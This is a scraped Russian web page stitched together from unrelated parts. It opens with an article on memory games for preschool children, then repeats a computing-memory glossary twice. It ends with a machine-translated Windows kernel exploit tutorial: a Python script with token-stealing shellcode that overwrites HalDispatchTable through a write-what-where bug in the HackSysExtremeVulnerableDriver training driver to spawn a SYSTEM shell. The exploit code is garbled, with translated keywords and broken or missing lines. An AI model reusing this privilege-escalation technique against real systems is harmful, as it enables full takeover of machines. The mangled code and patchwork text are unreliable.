память основывается на:
- внимательности;
- аналитическом уме;
- способности делать выводы.
Важно! Если человек наделен навыком легко вспоминать, а не запоминать — значит, он обладает секретом хорошей памяти.
Оперативная память характеризуется тем, что может беречь нужный материал в течение определенного времени, которое длится либо несколько секунд или несколько дней. Все зависит от задачи, которую необходимо решить. После выполнения задания, оперативной память удаляет используемый материал.
SOURCE
Как с помощью игр развить произвольную память
Как развить произвольную память у детей. Не так редки жалобы
родителей на детей, что те с трудом запоминают стишки, буквы, цифры. От памяти
зависит мышление человека, поэтому развивать ее в детстве крайне важно. Память так же важна, как и усидчивость и
даже больше.
Наверняка все замечали, как дети быстро усваивают
иностранные языки и намного быстрее учат стихи, чем взрослые. Отнюдь это не
означает, что дополнительные занятия им не нужны. Однако дети неусидчивы и
непосредственны. Заставлять их часами сидеть не эффективно, следовательно, обучение ребенка нужно начинать с помощью игр.
Ребята как известно не сидят на месте. Развивать произвольную память в момент подвижных игр вполне возможно. Игры пригодятся и дома, когда ребенок отдыхает, и во время прогулки и в детском саду.
SOURCE
Игры на развитие памяти
Игры являются мощным инструментом в развитии памяти у детей. Занимайтесь с ребенком как можно чаще и вы удивитесь результатам.
SOURCE
Игра «Что изменилось?»
Перед ребенком кладут 6-7 игрушек и предлагают запомнить все игрушки, а также их расположение. Затем ребенок отворачивается, а две игрушки переставляют или прячут. Ребенок должен угадать. Эту игру постепенно можно усложнять.
SOURCE
Игра «Снежный ком»
Мама начинает на словах варить обед. «Я налью воду в кастрюлю и поставлю на огонь». Затем вторит ребенок: «Я брошу в кастрюли мясо, картошку, луковицу». И так далее. Темой может быть и отдых на берегу моря, и прогулка в лесу и так далее.
SOURCE
Игра «Магазин»
Например, малыш является покупателем, перед ним стоит задача закупить несколько продуктов. Количество не должно превышать шести или семи. Такая игра развивает память. Чем больше ребенок называет предметы, тем большего он достоин поощрения.
Существует огромное количество других игр, предназначенных для развития произвольной памяти.На сайте о развитии памяти у детей можно найти множество интересных игр.
SOURCE
Развитие произвольного внимания и памяти
Характеристиками внимания являются концентрация и
устойчивость. Этими навыками обладают и животные, но лишь человек способен к
произвольному вниманию. Малышам до десяти месяцев свойственно лишь
непроизвольное внимание. После, дети начинают совмещать произвольное и
непроизвольное внимание. Стоит ребенку указать на какой-либо предмет жестом,
как у него начинается перестройка внимания.
Наверное вам приходилось наблюдать за детьми,
которые впервые учатся писать. Ребенок при этом занятии не концентрируется
только на руке. Он движется всем туловищем, руками, качает голову и вынимает язык.
Внимание! Произвольное внимание направлено на торможение ненужных движений.
Концентрировать внимание дети учатся постепенно. Так к шести
месяцам ребенок может сосредоточенно играть приблизительно 14 минут, а к шести
годам это время растягивается до часа и полтора.
В три-четыре года дети еще не способны запомнить информацию особыми приемами. Лишь в старшем дошкольном возрасте с помощью мнемонических приемов ребенок постепенно переходит на произвольную память.
SOURCE
Предпосылки развития произвольной памяти дошкольников
Детская
память во многом отличается от памяти взрослых. Предметы и вещи, о которых
они имеют смутное представление расплываются в их памяти. Дети с удовольствием
ходят на детское представление и в цирк. Но если спустя время спросить, что они
запомнили, ответ будет расплывчатым. Полученные впечатления тускнеют и
сливаются в памяти младших дошкольников.
Их представления похожи на кусочки мозаики. Со временем они что-то забывают, что-то искажают. Это связано с тем, что детская память не совершенна, они пока не умеют пользоваться ею. Память, требующая волевого усилия развивается с возрастом, ученые считают, что это скорее зависит насколько совершенна техника применения или мнемонические приемы.
SOURCE
Предпосылками
развития произвольной памяти дошкольника являются:
- Характер обучения, например, игры.
- Способность запомнить пять слов и пять картинок из десяти предложений.
- Порядок воспроизведения материала.
У младших дошкольников характер развития произвольной памяти несколько другой. Для большего эффекта, у малыша лучше активизировать непроизвольную память. Сначала делать это ненавязчиво, с помощью игр, а затем просить его воспроизвести то, что запомнил. Учить стишки, обращать внимание на логические задачи и так далее.
SOURCE
Способы развития произвольной памяти у старших дошкольников
Дети, начиная с 4 лет лучше запоминают и воспроизводят материал,
они с удовольствием запоминают стишки, так как проявляются первые признаки
смыслового запоминания.
К семи годам у малыша память трансформируется в лучшую сторону. Дети начинают управлять поступающей информацией.. Память дошкольников и школьников младших классов совершенствуется из года в год. Однако между ними возникают существенные различия. У детей, учащихся первых классов значительнее развита способность воспроизведения. Регулярность, с которой они проделывают домашние задания и работу в классе, улучшает произвольную память.
SOURCE
Дидактические игры на развитие произвольной памяти
Дидактические игры значительно облегчают развитие произвольной памяти. Они делают малыша наблюдательнее, тем самым улучшая внимание. Возможно вам будет интересно рассмотреть некоторые игры.
Игра «Самый зоркий»
Улучшает память и внимание. Несколько детей (не больше пяти-семи) становятся лицом к ведущему, который в течение десяти секунд показывает им одну картинку. Затем она прячется среди других и дети должны отыскать ее. Кто первый найдет, тому и присуждается звание самого зоркого.
Игра «Где сестренка?»
Игра учит находить различие между похожими предметами. Для этого берутся несколько кукол-матрешек, которые отличаются деталями в одежде, прическе и так далее. Разрешается брать и нарисованные куклы. Эти куклы располагаются перед ребенком или в ряд или хаотично. Одна из матрешек лежит в стороне. Ребенок берет ее в руки и выискивает похожую на нее куклу. Ведущий и остальные дети в это время хлопают в ладошки до пяти раз. Если в течение хлопком похожая кукла не находится, право поиска передается другому малышу. Игру можно усложнить лишь раз показав матрешку, для которой нужно найти «сестренку».
Существует множество дидактических игр, найти их можно на сайте http://nashidetci.ru/didakticheskie-igryi-na-razvitie-proizvolnogo-vnimaniya-i-pamyati/
SOURCE
Изучение уровня развития произвольной образной памяти
Дети легко запоминают и воспроизводят предметы, но делают это бессистемно, хаотично. Зачастую главные детали они пропускают, концентрируясь на второстепенных.
Произвольная образная память совершенствуется с течением времени. Взрослые должны уметь направлять ее развитие. Например, чаще спрашивать малыша, что он помнит из прошедшего дня рождения или другого события. Ребенок почувствует в этом заботу старших и с удовольствием будет отвечать.
Чтобы приучить малыша контролировать события в жизни, взрослые
должны фиксировать его внимание на определенный порядок вещей: подъем,
умывание, завтрак, обед, прогулка и так далее. Дети, следуя этому распорядку,
получают ощущение стабильности в жизни. Они более уравновешенные и воспитанные.
Не менее важно рассказывать детям как прошли те или иные
приятные события, как он хорошо выступал, читал стишки, пел, танцевал и так
далее. Такой метод коллекционирования интересных событий развивает произвольную
образную память, оставляет в душе ощущение праздника и радости жизни.
Таким образом, от уровня развития произвольной образной
памяти зависит:
- объем сохраняемых детьми представлений;
- представления о предметах становятся все более четкими;
- растет подвижность сохраняемых образов.
Внимание! Необходимо запомнить, что дошкольный возраст — это время благоприятного развития памяти, особенно образной!
Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.
произвольной памяти — это … Что такое произвольная память?
Арифметика произвольной точности — В информатике арифметика произвольной точности указывает, что вычисления выполняются с числами, точность которых ограничена только доступной памятью хост-системы. Это контрастирует с более высокой фиксированной точностью…… Wikipedia
Безопасность памяти — Портал для тестирования программного обеспечения Безопасность памяти — это проблема при разработке программного обеспечения, целью которой является предотвращение программных ошибок, которые вызывают уязвимости безопасности, связанные с доступом к оперативной памяти (ОЗУ), например переполнение буфера и висячие указатели.…… Википедия
Обычная память — Области памяти семейства IBM PC. В управлении памятью DOS обычная память, также называемая базовой памятью, — это первые 640 килобайт (640 × 1024 байтов) памяти на IBM PC или совместимых системах. Это память для чтения и записи, используемая…… Wikipedia
Water memory — Память воды перенаправляется сюда. Чтобы узнать об испанском аргентинском фильме, см. «Память воды» (фильм). Требования к памяти воды При определенных обстоятельствах вода может сохранять память о частицах растворенного вещества после сколь угодно большого разбавления.Связанные научные…… Википедия
Память только для чтения — Понятие данных только для чтения может также относиться к разрешениям файловой системы. Постоянная память для чтения (обычно известная под аббревиатурой ROM) — это класс носителей, используемых в компьютерах и других электронных устройствах. Поскольку данные, хранящиеся в ПЗУ, не могут быть изменены… Wikipedia
Рабочая память — (также называемая кратковременной памятью, в зависимости от конкретной теории) является теоретической конструкцией в когнитивной психологии, которая относится к структурам и процессам, используемым для временного хранения и манипулирования информацией.Есть…… Википедия
Виртуальная память — Эта статья посвящена вычислительной технике. Для игрового шоу TBN см. Virtual Memory (игровое шоу). Виртуальная память объединяет активную и неактивную память в дисковой форме в большой диапазон смежных адресов. В вычислениях, виртуальная память… Wikipedia
Флэш-память — Типы памяти компьютера Энергозависимая RAM DRAM (например, DDR SDRAM) SRAM В разработке T RAM Z RAM TTRAM Историческая память линии задержки Трубка Selectron Трубка Вильямса Энергонезависимая… Wikipedia
Управление памятью DOS — Эта статья посвящена классу драйверов устройств DOS.Для общей концепции см .: управление памятью. Области физической памяти семейства IBM PC. В компьютерах, совместимых с IBM PC, под управлением памятью DOS понимается программное обеспечение и методы, используемые для…… Wikipedia
Распределение динамической памяти C — Стандартная библиотека C Типы данных Классификация символов Строки Математика Ввод / вывод файлов Дата / время Локализация… Wikipedia
Программная транзакционная память — В информатике программная транзакционная память (STM) представляет собой механизм управления параллелизмом, аналогичный транзакциям базы данных для управления доступом к общей памяти в параллельных вычислениях.Это альтернатива синхронизации на основе блокировки. А…… Википедия
.
произвольной памяти — это … Что такое произвольная память?
Арифметика произвольной точности — В информатике арифметика произвольной точности указывает, что вычисления выполняются с числами, точность которых ограничена только доступной памятью хост-системы. Это контрастирует с более высокой фиксированной точностью…… Wikipedia
Безопасность памяти — Портал для тестирования программного обеспечения Безопасность памяти — это проблема при разработке программного обеспечения, целью которой является предотвращение программных ошибок, которые вызывают уязвимости безопасности, связанные с доступом к оперативной памяти (ОЗУ), например переполнение буфера и висячие указатели.…… Википедия
Обычная память — Области памяти семейства IBM PC. В управлении памятью DOS обычная память, также называемая базовой памятью, — это первые 640 килобайт (640 × 1024 байтов) памяти на IBM PC или совместимых системах. Это память для чтения и записи, используемая…… Wikipedia
Water memory — Память воды перенаправляется сюда. Чтобы узнать об испанском аргентинском фильме, см. «Память воды» (фильм). Требования к памяти воды При определенных обстоятельствах вода может сохранять память о частицах растворенного вещества после сколь угодно большого разбавления.Связанные научные…… Википедия
Память только для чтения — Понятие данных только для чтения может также относиться к разрешениям файловой системы. Постоянная память для чтения (обычно известная под аббревиатурой ROM) — это класс носителей, используемых в компьютерах и других электронных устройствах. Поскольку данные, хранящиеся в ПЗУ, не могут быть изменены… Wikipedia
Рабочая память — (также называемая кратковременной памятью, в зависимости от конкретной теории) является теоретической конструкцией в когнитивной психологии, которая относится к структурам и процессам, используемым для временного хранения и манипулирования информацией.Есть…… Википедия
Виртуальная память — Эта статья посвящена вычислительной технике. Для игрового шоу TBN см. Virtual Memory (игровое шоу). Виртуальная память объединяет активную и неактивную память в дисковой форме в большой диапазон смежных адресов. В вычислениях, виртуальная память… Wikipedia
Флэш-память — Типы памяти компьютера Энергозависимая RAM DRAM (например, DDR SDRAM) SRAM В разработке T RAM Z RAM TTRAM Историческая память линии задержки Трубка Selectron Трубка Вильямса Энергонезависимая… Wikipedia
Управление памятью DOS — Эта статья посвящена классу драйверов устройств DOS.Для общей концепции см .: управление памятью. Области физической памяти семейства IBM PC. В компьютерах, совместимых с IBM PC, под управлением памятью DOS понимается программное обеспечение и методы, используемые для…… Wikipedia
Распределение динамической памяти C — Стандартная библиотека C Типы данных Классификация символов Строки Математика Ввод / вывод файлов Дата / время Локализация… Wikipedia
Программная транзакционная память — В информатике программная транзакционная память (STM) представляет собой механизм управления параллелизмом, аналогичный транзакциям базы данных для управления доступом к общей памяти в параллельных вычислениях.Это альтернатива синхронизации на основе блокировки. А…… Википедия
.Учебное пособие по эксплуатации ядра Windows
, часть 3: Произвольная перезапись памяти (Write-What-Where)
import ctypes, sys, struct
from ctypes import *
from subprocess import *
class WriteWhatWhere (Structure):
_fields_ = [
(«Что», c_void_p),
(«Где», c_void_p)
]
def main ():
kernel32 = windll.kernel32
psapi = windll.Psapi
9000ll2. Ntdntdll
# Определение шелл-кода ring0 и загрузка его в VirtualAlloc.
шелл-код = bytearray (
«\ x90 \ x90 \ x90 \ x90» # NOP Sled
«\ x60» # pushad
«\ x31 \ xc0» # xor eax, eax
«\ x64 \ x8b \ x80 \ x24 \ x01 \ x00 \ x00 «# mov eax, [fs: eax + 0x124]
» \ x8b \ x40 \ x50 «# mov eax, [eax + 0x50]
» \ x89 \ xc1 «# mov ecx, eax
«\ xba \ x04 \ x00 \ x00 \ x00» # mov edx, 0x4
«\ x8b \ x80 \ xb8 \ x00 \ x00 \ x00» # mov eax, [eax + 0xb8]
» \ x2d \ xb8 \ x00 \ x00 \ x00 «# sub eax, 0xb8
» \ x39 \ x90 \ xb4 \ x00 \ x00 \ x00 «# cmp [eax + 0xb4], edx
» \ x75 \ xed «# jnz 0x1a
«\ x8b \ x90 \ xf8 \ x00 \ x00 \ x00» # mov edx, [eax + 0xf8]
«\ x89 \ x91 \ xf8 \ x00 \ x00 \ x00» # mov [ecx + 0xf8] , edx
«\ x61» # popad
«\ x31 \ xc0» # xor eax, eax
«\ x83 \ xc4 \ x24» # добавить esp, byte + 0x24
«\ x5d» # pop ebp
«\ xc2 \ x08 \ x00 «# Ret 0x8
)
ptr = kernel32.VirtualAlloc (c_int (0), c_int (len (шелл-код)), c_int (0x3000), c_int (0x40))
buff = (c_char * len (шелл-код)). From_buffer (шелл-код)
kernel32.RtlMoveMemory (c_int ( ptr), buff, c_int (len (шелл-код)))
shellcode_address = id (shellcode) + 20
shellcode_final = struct.pack (« shellcode_final_address = id (shellcode_final) + 20 print «[+] Адрес шеллкода Ring0: {0}». формат (шестнадцатеричный (shellcode_address)) print «[+] Указатель на шеллкод ring0: {0}».format (hex (shellcode_final_address)) # Нумерация адресов загрузки для всех драйверов устройств и выборка базового адреса и имени для ntkrnlpa.exe enum_base = (c_ulong * 1024) () enum = psapi.Enum_revicefrivers (by ), c_int (1024), byref (c_long ())) , если не enum: print «Не удалось перечислить !!!» sys.exit (-1) для base_address в enum_base: , если не base_address: continue base_name = c_char_p (‘\ x00’ * 1024) driver_base_name = psapi.GetDeviceDriverBaseNameA (base_address, base_name, 48) если не driver_base_name: print «Невозможно получить базовое имя драйвера !!!» sys.exit (-1) если base_name.value.lower () == ‘ntkrnl’ или ‘ntkrnl’ в base_name.value.lower (): base_name = base_name.value print «[+ ] Загруженное ядро: {0} «. Format (base_name) print» [+] Базовый адрес загруженного ядра: {0} «.format (hex (base_address)) break # Getting the HalDispatchTable kernel_handle = kernel32.LoadLibraryExA (base_name, None, 0x00000001) if not kernel_handle: print «Невозможно получить обработчик ядра 2. exit (-1) hal_address = kernel32.GetProcAddress (kernel_handle, ‘HalDispatchTable’) # Вычитание базы ntkrnlpa в пользовательском пространстве hal_address — = kernel_handle # Чтобы найти адрес базы HalDispatch в пространстве of ntkrnpa в пространстве ядра hal_address + = base_address
# Просто добавьте 0x4 к адресу HAL для HalDispatchTable + 0x4
hal4 = hal_address + 0x4
print «[+] HalDispatchTable:формат (шестнадцатеричный (hal_address))
print «[+] HalDispatchTable + 0x4: {0}». format (hex (hal4))
# What-Where
www = WriteWhatWhere ()
www.What = shellcode_final_address
www.Where = hal4
www_pointer = pointer (www)
print «[+] What: {0}». Format (hex (www.What))
print «[+] Где: {0} «.format (шестнадцатеричный (www.Where))
hevDevice = kernel32.CreateFileA (» \\\\. \\ HackSysExtremeVulnerableDriver «, 0xC0000000, 0, None, 0x3, 0, None)
, если не hevDevice или hevDevice = -1:
print «*** Не удалось получить дескриптор драйвера устройства»
sys.exit (-1)
kernel32.DeviceIoControl (hevDevice, 0x0022200B, www_pointer, 0x8, None, 0, byref (c_ulong ()), None)
# Вызов функции NtQueryIntervalProfile, выполнение нашего шелл-кода
, byref (c_ulong ()))
print «[+] nt author \ system shell incoming»
Popen («start cmd», shell = True)
if __name__ == «__main__»:
main ()
.